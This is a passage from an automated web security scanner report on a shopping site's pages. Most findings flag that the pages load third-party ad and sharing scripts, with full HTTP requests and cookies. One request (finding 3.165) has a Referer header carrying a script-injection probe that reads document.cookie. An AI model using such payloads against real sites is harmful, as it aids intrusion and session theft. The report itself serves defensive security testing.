src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.161. http://secureshopping.mcafee.com/browse/office-products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/office-products/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/office-products/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:54 GMT
Content-Length: 80367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Office Products at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.162. http://secureshopping.mcafee.com/browse/software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/software/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/software/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:57 GMT
Content-Length: 52302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Software at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.163. http://secureshopping.mcafee.com/browse/sports-outdoors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/sports-outdoors/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/sports-outdoors/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:02 GMT
Content-Length: 55621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Sports & Outdoors at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.164. http://secureshopping.mcafee.com/browse/toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:04 GMT
Content-Length: 62652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Toys at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.165. http://secureshopping.mcafee.com/browse/toys/cars,-trains-planes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/toys/cars,-trains-planes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/toys/cars,-trains-planes/ HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/babyb75be%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c34af5df36/toys/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293299751.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __utma=192341800.102881162.1293269981.1293269981.1293299685.2; __utmc=192341800; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 18:32:31 GMT
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Dec 2010 18:32:31 GMT
Content-Length: 68478

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Cars, Trains & Planes at McAfee Secure Shopping - Search, Di
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.166. http://secureshopping.mcafee.com/browse/video-games/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/video-games/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/video-games/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:06 GMT
Content-Length: 63991

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Video Games at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.167. http://secureshopping.mcafee.com/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577 HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.3.10.1293336482; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:36 GMT
Set-Cookie: user=id=1293248423528-1-dMZf&ph=214785577; path=/; expires=Mon, 26-Dec-2011 04:08:36 GMT
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:36 GMT
Content-Length: 26238

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Securely Find Prices on Canon EOS-1D 3822B00
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.168. http://secureshopping.mcafee.com/hot-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/hot-products

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /hot-products HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:06 GMT
Content-Length: 97577

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping</title>
<meta name="description" content="Your
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.169. http://secureshopping.mcafee.com/legal.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/legal.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /legal.jsp HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:16 GMT
Content-Length: 11239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>Legal Disclaimer - McAfee Secure Shopping</title>
<meta name="descrip
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.170. http://secureshopping.mcafee.com/merchants-intro.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/merchants-intro.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /merchants-intro.jsp HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; 